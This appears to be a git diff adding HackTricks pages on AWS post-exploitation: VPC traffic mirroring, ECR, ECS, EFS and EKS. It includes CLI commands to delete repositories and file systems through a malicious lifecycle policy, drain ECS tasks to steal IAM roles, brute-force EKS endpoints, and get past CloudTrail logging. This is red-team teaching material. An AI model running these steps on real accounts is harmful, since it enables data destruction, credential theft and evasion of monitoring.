+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
+
+Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**.
+
+To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts.
+
+The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible.
+
+For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
new file mode 100644
index 0000000000..3d8bb5192d
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md
@@ -0,0 +1,122 @@
+# AWS - ECR Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECR
+
+For more information check
+
+{% content-ref url="../aws-services/aws-ecr-enum.md" %}
+[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md)
+{% endcontent-ref %}
+
+### Login, Pull & Push
+
+{% code overflow="wrap" %}
+```bash
+# Docker login into ecr
+## For public repo (always use us-east-1)
+aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/<random-id>
+## For private repo
+aws ecr get-login-password --profile <profile_name> --region <region> | docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
+## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account
+
+# Download
+docker pull <account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest
+## If you still have the error "Requested image not found"
+## It might be because the tag "latest" doesn't exit
+## Get valid tags with: 
+TOKEN=$(aws --profile <profile> ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken')
+curl -i -H "Authorization: Basic $TOKEN" https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list
+
+# Inspect the image
+docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
+
+# Upload (example uploading purplepanda with tag latest)
+docker tag purplepanda:latest <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
+docker push <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
+
+# Downloading without Docker
+# List digests
+aws ecr batch-get-image --repository-name level2 \
+    --registry-id 653711331788 \
+    --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
+
+## Download a digest
+aws ecr get-download-url-for-layer \
+    --repository-name level2 \
+    --registry-id 653711331788 \
+    --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
+```
+{% endcode %}
+
+After downloading the images you should **check them for sensitive info**:
+
+{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics" %}
+
+### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`
+
+An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository.
+
+```bash
+bashCopy code# Create a JSON file with the malicious lifecycle policy
+echo '{
+  "rules": [
+    {
+      "rulePriority": 1,
+      "description": "Delete all images",
+      "selection": {
+        "tagStatus": "any",
+        "countType": "imageCountMoreThan",
+        "countNumber": 0
+      },
+      "action": {
+        "type": "expire"
+      }
+    }
+  ]
+}' > malicious_policy.json
+
+# Apply the malicious lifecycle policy to the ECR repository
+aws ecr put-lifecycle-policy --repository-name your-ecr-repo-name --lifecycle-policy-text file://malicious_policy.json
+
+# Delete the ECR repository
+aws ecr delete-repository --repository-name your-ecr-repo-name --force
+
+# Delete the ECR public repository
+aws ecr-public delete-repository --repository-name your-ecr-repo-name --force
+
+# Delete multiple images from the ECR repository
+aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
+
+# Delete multiple images from the ECR public repository
+aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
new file mode 100644
index 0000000000..096bdaea62
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md
@@ -0,0 +1,88 @@
+# AWS - ECS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-ecs-enum.md" %}
+[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md)
+{% endcontent-ref %}
+
+### Host IAM Roles
+
+In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\
+Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+{% hint style="danger" %}
+Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
+{% endhint %}
+
+### Privesc to node to steal other containers creds & secrets
+
+But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
+
+#### Making containers run in current host
+
+Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
+
+```bash
+aws ecs update-container-instances-state \
+    --cluster <cluster> --status DRAINING --container-instances <container-instance-id>
+```
+
+The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
+
+```bash
+aws ecs deregister-container-instance \
+    --cluster <cluster> --container-instance <container-instance-id> --force
+```
+
+A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
+
+```bash
+# Needs: ecs:SubmitTaskStateChange
+aws ecs submit-task-state-change --cluster <value> \
+    --status STOPPED --reason "anything" --containers [...]
+
+# Needs: ecs:SubmitContainerStateChange
+aws ecs submit-container-state-change ...
+
+# Needs: ecs:SubmitAttachmentStateChanges
+aws ecs submit-attachment-state-changes ...
+```
+
+### Steal sensitive info from ECR containers
+
+The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
new file mode 100644
index 0000000000..1a78c9dd21
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md
@@ -0,0 +1,80 @@
+# AWS - EFS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EFS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-efs-enum.md" %}
+[aws-efs-enum.md](../aws-services/aws-efs-enum.md)
+{% endcontent-ref %}
+
+### `elasticfilesystem:DeleteMountTarget`
+
+An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
+
+```sql
+aws efs delete-mount-target --mount-target-id <value>
+```
+
+**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
+
+### `elasticfilesystem:DeleteFileSystem`
+
+An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
+
+```perl
+aws efs delete-file-system --file-system-id <value>
+```
+
+**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
+
+### `elasticfilesystem:UpdateFileSystem`
+
+An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
+
+```sql
+aws efs update-file-system --file-system-id <value> --provisioned-throughput-in-mibps <value>
+```
+
+**Potential Impact**: Degradation of file system performance or resource exhaustion.
+
+### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
+
+An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
+
+```arduino
+aws efs create-access-point --file-system-id <value> --posix-user <value> --root-directory <value>
+aws efs delete-access-point --access-point-id <value>
+```
+
+**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
new file mode 100644
index 0000000000..3421ae7cc7
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md
@@ -0,0 +1,186 @@
+# AWS - EKS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EKS
+
+For mor information check
+
+{% content-ref url="../aws-services/aws-eks-enum.md" %}
+[aws-eks-enum.md](../aws-services/aws-eks-enum.md)
+{% endcontent-ref %}
+
+### Enumerate the cluster from the AWS Console
+
+If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
+
+### Connect to AWS Kubernetes Cluster
+
+* Easy way:
+
+```bash
+# Generate kubeconfig
+aws eks update-kubeconfig --name aws-eks-dev
+```
+
+* Not that easy way:
+
+If you can **get a token** with **`aws eks get-token --name <cluster_name>`** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**.
+
+In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name):
+
+{% code overflow="wrap" %}
+```bash
+API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com
+
+/etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false
+```
+{% endcode %}
+
+<details>
+
+<summary>kube config</summary>
+
+```yaml
+describe-cache-parametersapiVersion: v1
+clusters:
+- cluster:
+    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
+    server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
+  name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+contexts:
+- context:
+    cluster: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+    user: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+  name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+current-context: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+kind: Config
+preferences: {}
+users:
+- name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+  user:
+    exec:
+      apiVersion: client.authentication.k8s.io/v1beta1
+      args:
+      - --region
+      - us-west-2
+      - --profile
+      - <profile>
+      - eks
+      - get-token
+      - --cluster-name
+      - <cluster-name>
+      command: aws
+      env: null
+      interactiveMode: IfAvailable
+      provideClusterInfo: false
+```
+
+</details>
+
+### From AWS to Kubernetes
+
+The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**.
+
+The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
+
+{% hint style="warning" %}
+Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
+{% endhint %}
+
+For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps).
+
+Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
+
+### From Kubernetes to AWS
+
+It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
+
+### GET Api Server Endpoint from a JWT Token
+
+Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is
+
+```bash
+https://<cluster-id>.<two-random-chars><number>.<region>.eks.amazonaws.com
+```
+
+Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one:
+
+* gr7
+* yl4
+
+Anyway are just 3 chars we can bruteforce them. Use the below script for generating the list
+
+```python
+from itertools import product
+from string import ascii_lowercase
+
+letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2)
+number_combinations = product('0123456789', repeat = 1)
+
+result = [
+	f'{''.join(comb[0])}{comb[1][0]}'
+	for comb in product(letter_combinations, number_combinations)
+]
+
+with open('out.txt', 'w') as f:
+	f.write('\n'.join(result))
+```
+
+Then with wfuzz
+
+```bash
+wfuzz -Z -z file,out.txt --hw 0 https://<cluster-id>.FUZZ.<region>.eks.amazonaws.com
+```
+
+{% hint style="warning" %}
+Remember to replace & .
+{% endhint %}
+
+### Bypass CloudTrail
+
+If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally).
+
+So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**.
+
+Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled).
+
+### EKS Ransom?
+
+By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster.
+
+So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**.
+
+{% hint style="success" %}
+Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster.
+
+Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
